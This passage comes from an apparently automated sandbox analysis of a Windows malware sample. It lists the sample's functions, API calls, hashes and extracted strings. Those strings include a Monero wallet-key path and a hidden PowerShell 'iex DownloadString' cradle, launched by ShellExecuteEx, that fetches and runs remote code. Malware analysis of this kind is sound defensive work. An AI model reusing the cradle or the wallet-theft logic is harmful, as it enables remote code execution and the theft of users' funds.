                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: 843a7ef3b1176f585ae75f52b21c3189c7c741ffb78296090c58c77c0aa1b7f7
                              • Instruction ID: 2f679dfbf4e0fbf47b19dacb599f069d64c5494a45701cae619734bd810817e9
                              • Opcode Fuzzy Hash: 843a7ef3b1176f585ae75f52b21c3189c7c741ffb78296090c58c77c0aa1b7f7
                              • Instruction Fuzzy Hash: 6C21FC7191021C9BDB24DB54DC95FE9B3B8FB48704F10C1DAE609A6280DF756A85CFD8
                              Function 004D99A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004D99C5
                              • Process32First.KERNEL32(004CA056,00000128), ref: 004D99D9
                              • Process32Next.KERNEL32(004CA056,00000128), ref: 004D99F2
                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004D9A4E
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 004D9A6C
                              • CloseHandle.KERNEL32(00000000), ref: 004D9A79
                              • CloseHandle.KERNEL32(004CA056), ref: 004D9A88
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                              • String ID:
                              • API String ID: 2696918072-0
                              • Opcode ID: 9521280f11761aef8f824404a0578d9943d078822b493141f7bfe9772478042e
                              • Instruction ID: f6c9ac409c7ded6ef22d22f8df823e2af023df88391ae5e64a688ae8bc5e5577
                              • Opcode Fuzzy Hash: 9521280f11761aef8f824404a0578d9943d078822b493141f7bfe9772478042e
                              • Instruction Fuzzy Hash: E5211A71910218ABDB25DFA1CC98BDEB7B5BB48300F0081CAE509A6390D7789E85CF94
                              Function 004D7820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004D7834
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004D783B
                              • RegOpenKeyExA.ADVAPI32(80000002,0129BFA0,00000000,00020119,00000000), ref: 004D786D
                              • RegQueryValueExA.ADVAPI32(00000000,012AE320,00000000,00000000,?,000000FF), ref: 004D788E
                              • RegCloseKey.ADVAPI32(00000000), ref: 004D7898
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 3ef0b9f58c0ba3b34c11e545c7fcf86ea8a6fe4dd95d46fd860b5580b14f6b27
                              • Instruction ID: dcfbfb209024c264c4c1cc62bf169a5860840961da67e04370bb764242867ff7
                              • Opcode Fuzzy Hash: 3ef0b9f58c0ba3b34c11e545c7fcf86ea8a6fe4dd95d46fd860b5580b14f6b27
                              • Instruction Fuzzy Hash: 68018475A54308BBEB04DBD0DD59F6E7778EB44700F008097F60496290E7789901DB58
                              Function 004D78B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004D78C4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004D78CB
                              • RegOpenKeyExA.ADVAPI32(80000002,0129BFA0,00000000,00020119,004D7849), ref: 004D78EB
                              • RegQueryValueExA.ADVAPI32(004D7849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 004D790A
                              • RegCloseKey.ADVAPI32(004D7849), ref: 004D7914
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: 2990119c2fe3997bbb18283d56e0b309ee6b58f89d71da67b28ed0039f3be4aa
                              • Instruction ID: d3b2d689248469f3b2473f9df7e85007f9cb3892af41d4c32e9933d0aa47b5c0
                              • Opcode Fuzzy Hash: 2990119c2fe3997bbb18283d56e0b309ee6b58f89d71da67b28ed0039f3be4aa
                              • Instruction Fuzzy Hash: FF0144B5A54309BBEB04DBD4DC49FAE7778EB44700F10859AF605A6280E7745A00CB94
                              Function 004D9470 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(>=M,80000000,00000003,00000000,00000003,00000080,00000000,?,004D3D3E,?), ref: 004D948C
                              • GetFileSizeEx.KERNEL32(000000FF,>=M), ref: 004D94A9
                              • CloseHandle.KERNEL32(000000FF), ref: 004D94B7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID: >=M$>=M
                              • API String ID: 1378416451-513215642
                              • Opcode ID: 4eda59d60b7acc291ed0f9e6c2648de3a37d5cf5907b2f44d718383a49b18458
                              • Instruction ID: e8ca0c7f0727466fe1e64af16c00f272fdb23ee9c419394de657deab636d7316
                              • Opcode Fuzzy Hash: 4eda59d60b7acc291ed0f9e6c2648de3a37d5cf5907b2f44d718383a49b18458
                              • Instruction Fuzzy Hash: 84F04435E58208BBDB14DFB4EC59F9E77B9AB48710F10C656FA11E7280D6789A02CB48
                              Function 004D4300 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 004D4325
                              • RegOpenKeyExA.ADVAPI32(80000001,012ADAA0,00000000,00020119,?), ref: 004D4344
                              • RegQueryValueExA.ADVAPI32(?,012AE4B8,00000000,00000000,00000000,000000FF), ref: 004D4368
                              • RegCloseKey.ADVAPI32(?), ref: 004D4372
                              • lstrcat.KERNEL32(?,00000000), ref: 004D4397
                              • lstrcat.KERNEL32(?,012AE4E8), ref: 004D43AB
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValuememset
                              • String ID:
                              • API String ID: 2623679115-0
                              • Opcode ID: d55e4ad7bf6b63b983512733c55782ec7e89d6bdd7173dda7239e087f7a9751d
                              • Instruction ID: 9f78e4cbfe86522d275e31b04444741ec1def36211c367c05f641b4165a4f288
                              • Opcode Fuzzy Hash: d55e4ad7bf6b63b983512733c55782ec7e89d6bdd7173dda7239e087f7a9751d
                              • Instruction Fuzzy Hash: 5E41C9B69101086BDF14EBA0EC56FEE733CBB88300F00C55FB71556191EA799A89CBE5
                              Function 004CA110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004CA13C
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 004CA161
                              • LocalAlloc.KERNEL32(00000040,?), ref: 004CA181
                              • ReadFile.KERNEL32(000000FF,?,00000000,004C148F,00000000), ref: 004CA1AA
                              • LocalFree.KERNEL32(004C148F), ref: 004CA1E0
                              • CloseHandle.KERNEL32(000000FF), ref: 004CA1EA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: ba03b0db0d86b2a3f400302200eb6c1a19698c6253c62408ecb41f9533df739e
                              • Instruction ID: 8a1c537e045d1e29174782b868bf3a5ce3fed75ad68dcb3ea9c3506892e10a84
                              • Opcode Fuzzy Hash: ba03b0db0d86b2a3f400302200eb6c1a19698c6253c62408ecb41f9533df739e
                              • Instruction Fuzzy Hash: DE31EB78A00209EFDB14CF94D845FEE77B5BB48304F10815AE911A7390DB78AA91CFA5
                              Function 004DCB7E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Typememset
                              • String ID:
                              • API String ID: 3530896902-3916222277
                              • Opcode ID: 42e9109ec3d3a4bf873d6fd58c29326e2c4de93eb05430739c22d6e570eeee23
                              • Instruction ID: 878da340c5654f77b962fe92daeccf8155ce4a4a75c416c670d098d3e7db6c43
                              • Opcode Fuzzy Hash: 42e9109ec3d3a4bf873d6fd58c29326e2c4de93eb05430739c22d6e570eeee23
                              • Instruction Fuzzy Hash: 0A4119B01007985EDB218B248DE4FFB7BE99B41704F1444EFDA8A96242D2359A45DF64
                              Function 004D49D0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcat.KERNEL32(?,012AE518), ref: 004D4A2B
                                • Part of subcall function 004D8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004D8F9B
                              • lstrcat.KERNEL32(?,00000000), ref: 004D4A51
                              • lstrcat.KERNEL32(?,?), ref: 004D4A70
                              • lstrcat.KERNEL32(?,?), ref: 004D4A84
                              • lstrcat.KERNEL32(?,0129B8B0), ref: 004D4A97
                              • lstrcat.KERNEL32(?,?), ref: 004D4AAB
                              • lstrcat.KERNEL32(?,012ADD40), ref: 004D4ABF
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004D8F20: GetFileAttributesA.KERNEL32(00000000,?,004C1B94,?,?,004E577C,?,?,004E0E22), ref: 004D8F2F
                                • Part of subcall function 004D47C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004D47D0
                                • Part of subcall function 004D47C0: RtlAllocateHeap.NTDLL(00000000), ref: 004D47D7
                                • Part of subcall function 004D47C0: wsprintfA.USER32 ref: 004D47F6
                                • Part of subcall function 004D47C0: FindFirstFileA.KERNEL32(?,?), ref: 004D480D
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: a1c653f3fd720897aca46aa2c8874af3cadb77774959e94057e90828948abd26
                              • Instruction ID: c7b649368fd505c5fc9127e8293cf5c2b4b563e666930c7d8c3b2f65a6fbc93b
                              • Opcode Fuzzy Hash: a1c653f3fd720897aca46aa2c8874af3cadb77774959e94057e90828948abd26
                              • Instruction Fuzzy Hash: A1315FB691021867CB14EBB0DC95FED733CAB48704F40468FB24596251EE78A7C9CB9C
                              Function 004D2EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                              • ShellExecuteEx.SHELL32(0000003C), ref: 004D2FD5
                              Strings
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 004D2F14
                              • ')", xrefs: 004D2F03
                              • <, xrefs: 004D2F89
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 004D2F54
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: 51c02018c09f015e2cc78041d8bd008edfd16b5064584dbe11bf2e8a46fd4344
                              • Instruction ID: 40f437cd07a41129e58ccd967983e8664ec2a9d7380d5a827ce70d7d4932269b
                              • Opcode Fuzzy Hash: 51c02018c09f015e2cc78041d8bd008edfd16b5064584dbe11bf2e8a46fd4344
                              • Instruction Fuzzy Hash: 6B414C719102089ACB04EFA1C8B6BEDBB79AF10304F40405FE11267296DF782A5ACF99
                              Function 0053CBE2 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
